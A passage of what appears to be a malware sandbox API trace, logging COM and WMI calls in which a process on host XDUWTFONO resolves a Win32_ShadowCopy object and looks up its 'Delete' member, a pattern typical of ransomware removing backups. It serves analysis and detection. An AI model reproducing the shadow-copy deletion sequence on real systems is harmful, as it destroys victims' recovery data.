ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0108.692] IUnknown:Release (This=0x142498) returned 0x1 [0108.696] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be41720) returned 0x0 [0108.696] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41720, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0108.696] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41720, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be46a00) returned 0x0 [0108.696] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46a00, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be46a00) returned 0x0 [0108.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46a00, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0108.697] WbemDefPath:IUnknown:AddRef (This=0x1be46a00) returned 0x3 [0108.697] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0108.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46a00, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b92cce0) returned 0x0 [0108.697] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b92cce0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.697] WbemDefPath:IUnknown:Release (This=0x1b92cce0) returned 0x3 [0108.697] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0108.697] WbemDefPath:IUnknown:AddRef (This=0x1be46a00) returned 0x4 [0108.697] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46a00, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0108.698] WbemDefPath:IUnknown:Release (This=0x1be46a00) returned 0x3 [0108.698] WbemDefPath:IUnknown:Release (This=0x1be46a00) returned 0x2 [0108.698] WbemDefPath:IUnknown:Release (This=0x1be41720) returned 0x0 [0108.698] WbemDefPath:IUnknown:Release (This=0x1be46a00) returned 0x1 [0108.698] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0108.698] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0108.698] WbemDefPath:IUnknown:AddRef (This=0x1be46a00) returned 0x2 [0108.698] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46a00, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be46a00) returned 0x0 [0108.699] WbemDefPath:IUnknown:Release (This=0x1be46a00) returned 0x2 [0108.699] WbemDefPath:IUnknown:Release (This=0x1be46a00) returned 0x1 [0108.699] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0108.699] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0108.699] WbemDefPath:IUnknown:AddRef (This=0x1be46a00) returned 0x2 [0108.699] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be46a00, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be46a00) returned 0x0 [0108.699] WbemDefPath:IUnknown:Release (This=0x1be46a00) returned 0x2 [0108.699] WbemDefPath:IUnknown:AddRef (This=0x1be46a00) returned 0x3 [0108.699] WbemDefPath:IWbemPath:SetText (This=0x1be46a00, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x0 [0108.699] WbemDefPath:IUnknown:Release (This=0x1be46a00) returned 0x2 [0108.699] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0108.699] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0108.700] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0108.716] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0108.716] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0108.716] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0108.717] IWbemClassObject:Get (in: This=0x1be44830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0108.717] SysStringLen (param_1="root\\cimv2") returned 0xa [0108.717] IWbemClassObject:Get (in: This=0x1be44830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0108.718] SysStringLen (param_1="root\\cimv2") returned 0xa [0108.718] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0108.718] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0108.718] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0108.718] IWbemClassObject:Get (in: This=0x1be44830, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0108.718] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0108.718] IWbemClassObject:Get (in: This=0x1be44830, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0108.719] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0108.740] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d240 | out: puCount=0x1c90d240*=0x2) returned 0x0 [0108.740] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d240*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d240*=0x17, pszText=0x0) returned 0x0 [0108.740] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d240*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d240*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0108.740] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d240 | out: puCount=0x1c90d240*=0x2) returned 0x0 [0108.740] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d240*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d240*=0x17, pszText=0x0) returned 0x0 [0108.740] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d240*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d240*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0108.741] IWbemClassObject:GetNames (in: This=0x1be44830, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c90d238*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c90d230 | out: pNames=0x1c90d230*="\x01ƀ\x08") returned 0x0 [0108.741] SafeArrayGetDim (psa=0x1b927d10) returned 0x1 [0108.742] IWbemClassObject:Get (in: This=0x1be44830, wszName="__GENUS", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=0, plFlavor=0x1c90d228*=0 | out: pVal=0x1c90d230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d22c*=3, plFlavor=0x1c90d228*=64) returned 0x0 [0108.742] IWbemClassObject:Get (in: This=0x1be44830, wszName="__CLASS", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=0, plFlavor=0x1c90d228*=0 | out: pVal=0x1c90d230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64) returned 0x0 [0108.742] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0108.742] IWbemClassObject:Get (in: This=0x1be44830, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=0, plFlavor=0x1c90d228*=0 | out: pVal=0x1c90d230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_LogicalElement", varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64) returned 0x0 [0108.743] SysStringLen (param_1="CIM_LogicalElement") returned 0x12 [0108.743] IWbemClassObject:Get (in: This=0x1be44830, wszName="__DYNASTY", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=0, plFlavor=0x1c90d228*=0 | out: pVal=0x1c90d230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64) returned 0x0 [0108.743] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18 [0108.743] IWbemClassObject:Get (in: This=0x1be44830, wszName="__RELPATH", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=0, plFlavor=0x1c90d228*=0 | out: pVal=0x1c90d230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64) returned 0x0 [0108.743] SysStringLen (param_1="Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x3c [0108.743] IWbemClassObject:Get (in: This=0x1be44830, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=0, plFlavor=0x1c90d228*=0 | out: pVal=0x1c90d230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1c, varVal2=0x0), pType=0x1c90d22c*=3, plFlavor=0x1c90d228*=64) returned 0x0 [0108.744] IWbemClassObject:Get (in: This=0x1be44830, wszName="__DERIVATION", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=0, plFlavor=0x1c90d228*=0 | out: pVal=0x1c90d230*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b927c90*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b911950, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x1c90d22c*=8200, plFlavor=0x1c90d228*=64) returned 0x0 [0108.745] IWbemClassObject:Get (in: This=0x1be44830, wszName="__SERVER", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=0, plFlavor=0x1c90d228*=0 | out: pVal=0x1c90d230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64) returned 0x0 [0108.745] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0108.745] IWbemClassObject:Get (in: This=0x1be44830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=0, plFlavor=0x1c90d228*=0 | out: pVal=0x1c90d230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64) returned 0x0 [0108.745] SysStringLen (param_1="root\\cimv2") returned 0xa [0108.745] IWbemClassObject:Get (in: This=0x1be44830, wszName="__PATH", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=0, plFlavor=0x1c90d228*=0 | out: pVal=0x1c90d230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64) returned 0x0 [0108.745] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x53 [0108.745] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d2d0 | out: puCount=0x1c90d2d0*=0x2) returned 0x0 [0108.745] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d2d0*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d2d0*=0x17, pszText=0x0) returned 0x0 [0108.745] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d2d0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d2d0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0108.745] IWbemClassObject:Get (in: This=0x1be44830, wszName="Delete", lFlags=0, pVal=0x1c90d2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d2bc*=0, plFlavor=0x1c90d2b8*=0 | out: pVal=0x1c90d2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d2bc*=0, plFlavor=0x1c90d2b8*=0) returned 0x80041002 [0108.746] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x1c90d328 | out: pperrinfo=0x1c90d328*=0x0) returned 0x1 [0108.747] IIDFromString (in: lpsz="{EB87E1BD-3233-11D2-AEC9-00C04FB68820}", lpiid=0x1c90d120 | out: lpiid=0x1c90d120) returned 0x0 [0108.748] CoGetClassObject (in: rclsid=0x1b920878*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90cf90 | out: ppv=0x1c90cf90*=0x1be417c0) returned 0x0 [0108.750] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be417c0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cca0 | out: ppvObject=0x1c90cca0*=0x0) returned 0x80004002 [0108.750] WbemStatusCodeText:IClassFactory:CreateInstance (in: This=0x1be417c0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cc88 | out: ppvObject=0x1c90cc88*=0x1be417e0) returned 0x0 [0108.750] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be417e0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cb90 | out: ppvObject=0x1c90cb90*=0x1be417e0) returned 0x0 [0108.750] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be417e0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cc10 | out: ppvObject=0x1c90cc10*=0x0) returned 0x80004002 [0108.751] WbemStatusCodeText:IUnknown:AddRef (This=0x1be417e0) returned 0x3 [0108.751] CoGetContextToken (in: pToken=0x1c90c860 | out: pToken=0x1c90c860) returned 0x0 [0108.751] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be417e0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c820 | out: ppvObject=0x1c90c820*=0x0) returned 0x80004002 [0108.751] CoGetContextToken (in: pToken=0x1c90c830 | out: pToken=0x1c90c830) returned 0x0 [0108.751] WbemStatusCodeText:IUnknown:AddRef (This=0x1be417e0) returned 0x4 [0108.751] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be417e0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c948 | out: ppvObject=0x1c90c948*=0x0) returned 0x80004002 [0108.751] WbemStatusCodeText:IUnknown:Release (This=0x1be417e0) returned 0x3 [0108.751] WbemStatusCodeText:IUnknown:Release (This=0x1be417e0) returned 0x2 [0108.751] WbemStatusCodeText:IUnknown:Release (This=0x1be417c0) returned 0x0 [0108.751] WbemStatusCodeText:IUnknown:Release (This=0x1be417e0) returned 0x1 [0108.752] CoGetContextToken (in: pToken=0x1c90ce50 | out: pToken=0x1c90ce50) returned 0x0 [0108.752] CoGetContextToken (in: pToken=0x1c90cd90 | out: pToken=0x1c90cd90) returned 0x0 [0108.752] WbemStatusCodeText:IUnknown:AddRef (This=0x1be417e0) returned 0x2 [0108.752] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be417e0, riid=0x1c90ced0*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1be417e0) returned 0x0 [0108.753] WbemStatusCodeText:IUnknown:Release (This=0x1be417e0) returned 0x2 [0108.753] WbemStatusCodeText:IUnknown:Release (This=0x1be417e0) returned 0x1 [0108.754] CoGetContextToken (in: pToken=0x1c90cfd0 | out: pToken=0x1c90cfd0) returned 0x0 [0108.754] CoGetContextToken (in: pToken=0x1c90cf10 | out: pToken=0x1c90cf10) returned 0x0 [0108.754] WbemStatusCodeText:IUnknown:AddRef (This=0x1be417e0) returned 0x2 [0108.754] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be417e0, riid=0x1c90d050*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppvObject=0x1c90d030 | out: ppvObject=0x1c90d030*=0x1be417e0) returned 0x0 [0108.754] WbemStatusCodeText:IUnknown:Release (This=0x1be417e0) returned 0x2 [0108.755] WbemStatusCodeText:IUnknown:AddRef (This=0x1be417e0) returned 0x3 [0108.755] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x1be417e0, hRes=0xffffffff80041002, LocaleId=0x0, lFlags=1, MessageText=0x1c90d308 | out: MessageText=0x1c90d308*="Not found ") returned 0x0 [0108.760] WbemStatusCodeText:IUnknown:Release (This=0x1be417e0) returned 0x2 [0108.760] SysStringLen (param_1="Not found ") returned 0xa [0108.784] IWbemClassObject:Get (in: This=0x1be44830, wszName="__SERVER", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=0, plFlavor=0x1c90d228*=0 | out: pVal=0x1c90d230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64) returned 0x0 [0108.785] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0108.785] IWbemClassObject:Get (in: This=0x1be44830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64 | out: pVal=0x1c90d230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64) returned 0x0 [0108.785] SysStringLen (param_1="root\\cimv2") returned 0xa [0108.785] IWbemClassObject:Get (in: This=0x1be44830, wszName="__CLASS", lFlags=0, pVal=0x1c90d230*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64 | out: pVal=0x1c90d230*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d22c*=8, plFlavor=0x1c90d228*=64) returned 0x0 [0108.785] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0108.786] CoGetObjectContext (in: riid=0x1c90d0d8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d0d0 | out: ppv=0x1c90d0d0*=0x142498) returned 0x0 [0108.787] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90d0f0 | out: pAptType=0x1c90d0f0*=1) returned 0x0 [0108.787] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90d1f8 | out: ppvObject=0x1c90d1f8*=0x0) returned 0x80004002 [0108.787] IUnknown:Release (This=0x142498) returned 0x1 [0108.788] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c760 | out: ppv=0x1c90c760*=0x1be417c0) returned 0x0 [0108.788] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be417c0, 